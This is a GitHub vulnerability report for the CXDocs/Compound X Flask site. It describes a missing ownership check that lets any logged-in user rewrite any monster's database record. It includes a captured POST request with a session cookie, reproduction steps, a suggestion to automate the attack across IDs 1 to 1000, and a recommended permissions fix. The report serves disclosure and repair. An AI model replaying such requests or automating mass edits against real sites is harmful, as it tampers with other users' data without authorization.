search

bleehu / CXDocs

Compound X rules displayed as web pages. Written in Python, served with Flask and bootstraped with bootswatch.
1 stars 1 forks source link

Bug allows for rewriting of arbitrary monster's data fields #266

Open Turtlelord26 opened 4 years ago

Turtlelord26 commented 4 years ago

Impact: Any user with a valid session cookie can rewrite the data fields of any monster in the database, regardless of ownership or privacy settings.

Steps to Reproduce:

  1. Navigate to https://www.compoundx.org and log in with a valid username and password.
  2. Navigate to https://www.compoundx.org/monstereditor
  3. Fill in required fields, then capture the packet generated by clicking the "Submit to DB" button (shown below)
  4. Change the monster id (91 in the example packet) to an arbitrary number, or a particular one if you happen to have a particular enemy in mind and know its id.
  5. Make arbitrary changes to data fields, such as name, description, privacy, etc, then submit the packet.
  6. Use automation software to submit packets cycling through monster ids from 1 to 1000 (or however high one prefers) to effect mass changes to all monsters.

POST /updateMonster/91 HTTP/1.1 Host: www.compoundx.org Connection: close Content-Length: 324 Cache-Control: max-age=0 Origin: https://www.compoundx.org Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Sec-Fetch-User: ?1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Referer: https://www.compoundx.org/monsterupdate/91 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESt2kQ.aPVNJtVkemmSxGB4I8usqrgEK90

strength=5&perception=5&fortitude=5&charisma=5&intelligence=5&dexterity=5&luck=5&name=hi+it%27s+me&level=1&role=Infantry&health=90&.nanites=90&shock=5&will=5&reflex=5&awareness=5&description="A+turtle+has+been+here...+and+here...+and+here..."&private=f

Recommended fix: Adding in permissions that disallow (non-admin) users from updating monsters that they did not make would prevent a bad actor with a single (non-admin) cookie from updating monsters owned by other users.